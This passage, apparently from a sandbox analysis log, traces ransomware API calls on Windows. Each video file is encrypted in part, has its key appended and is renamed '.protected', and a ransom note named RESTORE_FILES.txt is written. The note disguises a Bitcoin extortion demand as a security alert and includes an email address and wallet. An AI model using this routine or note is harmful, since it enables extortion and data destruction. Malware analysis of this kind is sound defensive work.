pbBuffer=0x295ec4c) returned 1 [0092.903] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\agm2SsPgMoj1u7.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\agm2sspgmoj1u7.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.904] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\agm2SsPgMoj1u7.mp4") returned 76 [0092.904] StrStrW (lpFirst="agm2SsPgMoj1u7.mp4", lpSrch=".txt") returned 0x0 [0092.904] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\agm2SsPgMoj1u7.mp4") returned 76 [0092.904] StrStrW (lpFirst="agm2SsPgMoj1u7.mp4", lpSrch=".rar") returned 0x0 [0092.904] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\agm2SsPgMoj1u7.mp4") returned 76 [0092.904] StrStrW (lpFirst="agm2SsPgMoj1u7.mp4", lpSrch=".zip") returned 0x0 [0092.904] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.904] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.904] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.905] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.905] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.905] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.905] CloseHandle (hObject=0xd8) returned 1 [0092.905] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\agm2SsPgMoj1u7.mp4.protected") returned 86 [0092.905] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\agm2SsPgMoj1u7.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\agm2sspgmoj1u7.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\agm2SsPgMoj1u7.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\agm2sspgmoj1u7.mp4.protected")) returned 1 [0092.906] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.906] lstrcmpiW (lpString1="ed7DJzRsavSU_tnUNYWa.flv", lpString2="Windows") returned -1 [0092.906] lstrcmpiW (lpString1="ed7DJzRsavSU_tnUNYWa.flv", lpString2="Program Files") returned -1 [0092.906] lstrcmpiW (lpString1="ed7DJzRsavSU_tnUNYWa.flv", lpString2="Program Files (x86)") returned -1 [0092.906] lstrcmpiW (lpString1="ed7DJzRsavSU_tnUNYWa.flv", lpString2="$Recycle.bin") returned 1 [0092.906] lstrcmpiW (lpString1="ed7DJzRsavSU_tnUNYWa.flv", lpString2="System Volume Information") returned -1 [0092.906] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\ed7DJzRsavSU_tnUNYWa.flv") returned 82 [0092.906] StrStrIW (lpFirst="ed7DJzRsavSU_tnUNYWa.flv", lpSrch=".protected") returned 0x0 [0092.906] lstrcmpW (lpString1="ed7DJzRsavSU_tnUNYWa.flv", lpString2="RESTORE_FILES.txt") returned -1 [0092.906] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.906] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\ed7DJzRsavSU_tnUNYWa.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\ed7djzrsavsu_tnunywa.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\ed7DJzRsavSU_tnUNYWa.flv") returned 82 [0092.906] StrStrW (lpFirst="ed7DJzRsavSU_tnUNYWa.flv", lpSrch=".txt") returned 0x0 [0092.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\ed7DJzRsavSU_tnUNYWa.flv") returned 82 [0092.906] StrStrW (lpFirst="ed7DJzRsavSU_tnUNYWa.flv", lpSrch=".rar") returned 0x0 [0092.906] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\ed7DJzRsavSU_tnUNYWa.flv") returned 82 [0092.906] StrStrW (lpFirst="ed7DJzRsavSU_tnUNYWa.flv", lpSrch=".zip") returned 0x0 [0092.906] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.907] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.907] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.907] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.907] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.907] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.907] CloseHandle (hObject=0xd8) returned 1 [0092.907] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\ed7DJzRsavSU_tnUNYWa.flv.protected") returned 92 [0092.907] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\ed7DJzRsavSU_tnUNYWa.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\ed7djzrsavsu_tnunywa.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\ed7DJzRsavSU_tnUNYWa.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\ed7djzrsavsu_tnunywa.flv.protected")) returned 1 [0092.908] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.908] lstrcmpiW (lpString1="EISJFQxzE7B01Dm.flv", lpString2="Windows") returned -1 [0092.908] lstrcmpiW (lpString1="EISJFQxzE7B01Dm.flv", lpString2="Program Files") returned -1 [0092.908] lstrcmpiW (lpString1="EISJFQxzE7B01Dm.flv", lpString2="Program Files (x86)") returned -1 [0092.908] lstrcmpiW (lpString1="EISJFQxzE7B01Dm.flv", lpString2="$Recycle.bin") returned 1 [0092.908] lstrcmpiW (lpString1="EISJFQxzE7B01Dm.flv", lpString2="System Volume Information") returned -1 [0092.908] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\EISJFQxzE7B01Dm.flv") returned 77 [0092.908] StrStrIW (lpFirst="EISJFQxzE7B01Dm.flv", lpSrch=".protected") returned 0x0 [0092.908] lstrcmpW (lpString1="EISJFQxzE7B01Dm.flv", lpString2="RESTORE_FILES.txt") returned -1 [0092.908] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.908] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\EISJFQxzE7B01Dm.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\eisjfqxze7b01dm.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\EISJFQxzE7B01Dm.flv") returned 77 [0092.908] StrStrW (lpFirst="EISJFQxzE7B01Dm.flv", lpSrch=".txt") returned 0x0 [0092.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\EISJFQxzE7B01Dm.flv") returned 77 [0092.908] StrStrW (lpFirst="EISJFQxzE7B01Dm.flv", lpSrch=".rar") returned 0x0 [0092.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\EISJFQxzE7B01Dm.flv") returned 77 [0092.908] StrStrW (lpFirst="EISJFQxzE7B01Dm.flv", lpSrch=".zip") returned 0x0 [0092.908] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.909] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.909] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.909] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.909] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.909] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.909] CloseHandle (hObject=0xd8) returned 1 [0092.909] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\EISJFQxzE7B01Dm.flv.protected") returned 87 [0092.910] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\EISJFQxzE7B01Dm.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\eisjfqxze7b01dm.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\EISJFQxzE7B01Dm.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\eisjfqxze7b01dm.flv.protected")) returned 1 [0092.910] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.910] lstrcmpiW (lpString1="HNpXh8o5.mp4", lpString2="Windows") returned -1 [0092.910] lstrcmpiW (lpString1="HNpXh8o5.mp4", lpString2="Program Files") returned -1 [0092.910] lstrcmpiW (lpString1="HNpXh8o5.mp4", lpString2="Program Files (x86)") returned -1 [0092.910] lstrcmpiW (lpString1="HNpXh8o5.mp4", lpString2="$Recycle.bin") returned 1 [0092.910] lstrcmpiW (lpString1="HNpXh8o5.mp4", lpString2="System Volume Information") returned -1 [0092.910] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\HNpXh8o5.mp4") returned 70 [0092.910] StrStrIW (lpFirst="HNpXh8o5.mp4", lpSrch=".protected") returned 0x0 [0092.910] lstrcmpW (lpString1="HNpXh8o5.mp4", lpString2="RESTORE_FILES.txt") returned -1 [0092.910] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.910] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\HNpXh8o5.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\hnpxh8o5.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.911] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\HNpXh8o5.mp4") returned 70 [0092.911] StrStrW (lpFirst="HNpXh8o5.mp4", lpSrch=".txt") returned 0x0 [0092.911] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\HNpXh8o5.mp4") returned 70 [0092.911] StrStrW (lpFirst="HNpXh8o5.mp4", lpSrch=".rar") returned 0x0 [0092.911] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\HNpXh8o5.mp4") returned 70 [0092.911] StrStrW (lpFirst="HNpXh8o5.mp4", lpSrch=".zip") returned 0x0 [0092.911] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.911] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.911] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.911] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.911] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.912] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.912] CloseHandle (hObject=0xd8) returned 1 [0092.912] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\HNpXh8o5.mp4.protected") returned 80 [0092.912] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\HNpXh8o5.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\hnpxh8o5.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\HNpXh8o5.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\hnpxh8o5.mp4.protected")) returned 1 [0092.912] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.912] lstrcmpiW (lpString1="s vZbgF fnd0l4SWf3Fx.avi", lpString2="Windows") returned -1 [0092.912] lstrcmpiW (lpString1="s vZbgF fnd0l4SWf3Fx.avi", lpString2="Program Files") returned 1 [0092.912] lstrcmpiW (lpString1="s vZbgF fnd0l4SWf3Fx.avi", lpString2="Program Files (x86)") returned 1 [0092.912] lstrcmpiW (lpString1="s vZbgF fnd0l4SWf3Fx.avi", lpString2="$Recycle.bin") returned 1 [0092.912] lstrcmpiW (lpString1="s vZbgF fnd0l4SWf3Fx.avi", lpString2="System Volume Information") returned -1 [0092.912] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\s vZbgF fnd0l4SWf3Fx.avi") returned 82 [0092.912] StrStrIW (lpFirst="s vZbgF fnd0l4SWf3Fx.avi", lpSrch=".protected") returned 0x0 [0092.912] lstrcmpW (lpString1="s vZbgF fnd0l4SWf3Fx.avi", lpString2="RESTORE_FILES.txt") returned 1 [0092.912] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.912] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\s vZbgF fnd0l4SWf3Fx.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\s vzbgf fnd0l4swf3fx.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.913] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\s vZbgF fnd0l4SWf3Fx.avi") returned 82 [0092.913] StrStrW (lpFirst="s vZbgF fnd0l4SWf3Fx.avi", lpSrch=".txt") returned 0x0 [0092.913] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\s vZbgF fnd0l4SWf3Fx.avi") returned 82 [0092.913] StrStrW (lpFirst="s vZbgF fnd0l4SWf3Fx.avi", lpSrch=".rar") returned 0x0 [0092.913] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\s vZbgF fnd0l4SWf3Fx.avi") returned 82 [0092.913] StrStrW (lpFirst="s vZbgF fnd0l4SWf3Fx.avi", lpSrch=".zip") returned 0x0 [0092.913] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.913] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.913] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.914] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.914] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.914] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.914] CloseHandle (hObject=0xd8) returned 1 [0092.914] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\s vZbgF fnd0l4SWf3Fx.avi.protected") returned 92 [0092.914] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\s vZbgF fnd0l4SWf3Fx.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\s vzbgf fnd0l4swf3fx.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\s vZbgF fnd0l4SWf3Fx.avi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\s vzbgf fnd0l4swf3fx.avi.protected")) returned 1 [0092.914] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0092.914] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0092.915] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\RESTORE_FILES.txt") returned 75 [0092.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\tyJtt8BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\tyjtt8br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.915] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.915] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0092.916] lstrlenA 